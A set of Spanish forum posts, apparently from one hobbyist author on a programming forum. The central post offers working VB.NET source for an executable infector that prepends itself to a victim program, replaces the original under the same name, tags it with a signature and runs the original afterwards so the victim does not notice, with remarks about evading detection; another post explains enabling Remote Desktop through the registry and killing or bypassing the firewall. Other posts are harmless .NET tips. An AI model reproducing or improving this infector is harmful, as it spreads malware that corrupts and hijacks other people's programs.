Gracias por fijarte, tienes razon en lo de la sentencia condicional:D El método Ejecutar_Hostage lo que hace es sacar el código de la aplicación original de la aplicación infectada. No sé si me explico a horrores, pero si es así recuerdamelo jajajaj.


El mío desde luego no, espero que dure tiempo sin ser "cazado". Por cierto, ¿podrias comentar algo sobre lo que estas buscando de cifrar el formato PE?

Saludos!

No vas mal encaminado Se autocopia la aplicación bajo Copia.exe para asi extraer los datos de nuestra aplicación. Luego abro archivo.exe que es el ejecutable a infectar, saco sus datos y los guardo en el array donde están los datos de nuestra aplicación. Entonces ya tenemos un array con los datos de ambas aplicaciones.. Le meto una Firma y creo el nuevo archivo bajo el nombre archivo.exe (el mismo que el del ejecutable anterior, para que la victima no sospeche).

Luego si el ejecutable tiene la Firma, entonces extraigo el ejecutable original temporalmente, así el usuario ejecuta nuestro código y el archivo original, para no levantar sospechas.

Saludos.

¿No le encuentras lógica a que nuestro programa guarde los datos ingresados en ciertos campos de texto? xD Diría que es de lo más util para no tener que guardarlo de forma indirecta (sobre .txt etc) No sólo eso, puedes guardar muchas propiedades del control, volver a dejarlo como estaba.

Aquí te dejo una captura de donde configurar las propiedades a guardar:



Saludos.

En la siguiente clave del registro: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\fDenyTSConnections cambia el valor a 0. Puede que el Firewall rechaze la conexión remota, te lo puedes cargar o añadir una excepción mediante Netsh en el puerto 3389.

Saludos.

Claro que me ha pasado. Sobre todo cuando decidí por aprender por mi mismo. Lo que me pasaba es que no terminaba nada de lo que empezaba, me atraían mogollon de cosas y como para estar en todas a la vez. Ayuda mucho el hecho de que vayas de rama en rama pues cuando quieras aprender algo que creas que es nuevo igual no lo es tanto. Eso sí, si realmente quieres conseguir algo y está en tu cabeza en mi caso podría leer hasta escrituras prehistoricas. Ahora eso ya cambió, ya he encotrado mi rama. Cosa de gustos, hasta que te acomodes.

Saludos.

Si quieres mostrar un dato en un Control como puedes ser un TextBox o un ComboBox debes saber que hay propiedades que guardan los atributos de los controles al cerrar la aplicación.

Puedes guardar la propiedad .Text de un TextBox pinchando sobre éste en el apartado de diseño y en ApplicationSettings > DataBindings seleccionas la propiedad a guardar. Aplicable a otro tipo de controles, era por poner un ejemplo.

Saludos.

Qué tal andamos?

Bueno, hace días que llevo programando una cosilla (bla bla) y necesitaba que mi código se ejecutara en otros procesos, para ello agrego mi código al principio de un nuevo ejecutable y después el del archivo a infectar. Hasta ahí bien, pero ¿qué sucede si la víctima abre el archivo infectado? ¿Estará corrupto? Nada de eso, se ejecutará mi código. El original seguirá en el ejecutable infectado pero no correrá.

Como al inicio de la aplicación comprobamos si existe la firma en el archivo infectado miramos si es así entonces abrimos el archivo infectado y llenamos un Buffer con los datos de éste. Después, como sabemos la longitud de los datos de nuestro programa, en función de ésta seremos capaces de extraer los bytes de la aplicación original.

Funciona a la perfección. Me gustaría que me dierais vuestra opinión, no estaría de más mejorar el código.

 Private Sub Infectar_EXE(ByVal Rutas As Object())
        Try
            Dim Ruta_Archivo As String = CType(Rutas(0), String) 'declaramos las rutas..
            Dim RutaHost As String = CType(Rutas(1), String)
            Dim fs As New FileStream(Ruta_Archivo, FileMode.Open, FileAccess.Read) 'abrimos nuestra copia
            Dim size As Long = fs.Length 'obtenemos los datos de nuestra copia
            Dim Buffer(size) As Byte 'declaramos un Buffer que tendrá como tamaño los datos de nuestra copia
            Dim firma As Byte() = Encoding.Default.GetBytes("Firma") 'Preparamos la firma para escribirla/buscarla en el Buffer
            fs.Read(Buffer, 0, Buffer.Length) 'escribimos en el Buffer actual los datos de la copia
            fs.Close()
            Kill(Ruta_Archivo) 'eliminamos la copia
            fs = New FileStream(RutaHost, FileMode.Open, FileAccess.Read) 'apuntamos al archivo que se generará..
            size += (fs.Length) 'obtenemos el nuevo tamaño para el Buffer (longitud de los datos de nuestro progama + long. datos del programa Host)
            Dim offset As Long = size - fs.Length 'obtenemos los datos de la copia (Repetido pero necesario)
            If IndexOf(Buffer, firma) = -1 Then 'Si la Firma NO ESTÁ en la copia...
                Array.Resize(Buffer, size) 'Modificamos el tamaño del Buffer en función de la variable Size
                fs.Read(Buffer, offset, fs.Length) 'Llenamos el Buffer
                fs.Close()
                Kill(RutaHost) 'Eliminamos el archivo
                fs = New FileStream(RutaHost, FileMode.Create, FileAccess.Write)
                fs.Write(Buffer, 0, Buffer.Length) 'Guardamos un nuevo archivo que será el nuestro Infectado
                fs.Write(firma, 0, firma.Length) 'Le añadimos la Firma al final
                fs.Close()
            Else
                'Como hemos encontrado la Firma entonces..
                fs.Close()
                Ejecutar_Hostage(RutaHost, Buffer, 17920, Buffer.Length - 17920) 'Generamos el archivo Original y lo ejecutamos
            End If
        Catch ex As Exception
            MsgBox(ex.Message)
        End Try
    End Sub
    Private Sub Ejecutar_Hostage(ByVal RutaHost As String, ByVal Buffer As Byte(), ByVal offset As Long, ByVal Count As Int32)
        Dim copia_temporal As New FileStream("C:\temporal.exe", FileMode.Create, FileAccess.Write)
        copia_temporal.Write(Buffer, offset, Count)
        copia_temporal.Close()
        If Not Process.GetCurrentProcess.MainModule.FileName.Contains("Infectar Ejecutables") Then 'Si el nombre del Archivo que se ha ejecutado
            'es distinto del que usamos para la infección
            Process.Start("C:\temporal.exe")
        End If
    End Sub
    Private Sub Form1_Load(sender As System.Object, e As System.EventArgs) Handles MyBase.Load
        FileSystem.FileCopy(Process.GetCurrentProcess.MainModule.FileName, "C:\copia.exe") 'nos copiamos en C:\
        Dim Obj() As Object = {"C:\copia.exe", "C:\archivo.exe"} 'inicio un array que contendra las rutas de los archivos
        Dim ThreadInfectar As New Thread(AddressOf Infectar_EXE)
        ThreadInfectar.Start(Obj) 'iniciamos un nuevo hilo pasandole las rutas
    End Sub
    Private Function IndexOf(BuscarEnArray As Byte(), EncotrarBytes As Byte()) As Integer
        'buscamos en el Buffer la Firma
        Dim encoding__1 As Encoding = Encoding.GetEncoding(1252)
        Dim buscar As String = encoding__1.GetString(BuscarEnArray, 0, BuscarEnArray.Length)
        Dim encontrar As String = encoding__1.GetString(EncotrarBytes, 0, EncotrarBytes.Length)
        Dim result As Integer = buscar.IndexOf(encontrar, StringComparison.Ordinal)
        Return result
    End Function
 

Poco tiene esto de Spreader, pero eso ya me lo guardo para mí jejeje.

Saludos.

No programo en Java pero creo entender lo que pides. Necesitas codear una función que lea los datos de un archivo y los pase a hexadecimal, todo ello en un visor.
Tenía curiosidad y lo acabo de hacer en .NET. Básicamente lo que tienes que hacer es:

crear un flujo y apuntar a tu archivo/aplicación. Leer los bytes del archivo y meterlos en un Buffer, para posteriormente pasar a hexadecimal todos los bytes del Buffer. Con eso estaría todo bien.

Saludos.

Tendrán un programa monitorizando las acciones de los equipos de tu trabajo. Si te llevas el portatil tal vez monitoricen las páginas que visitas, dudo de que puedan "escanear" tus archivos.

Si cambias tu IP por la de una máquina conectada a la misma red pues habrá dos en uso, seguramente a uno de los dos le dará problemas de conexión como acceso nulo.

Saludos.

No dejes de mirarlo, aunque cliente-servidor esten programados en distintos lenguajes.

Saludos.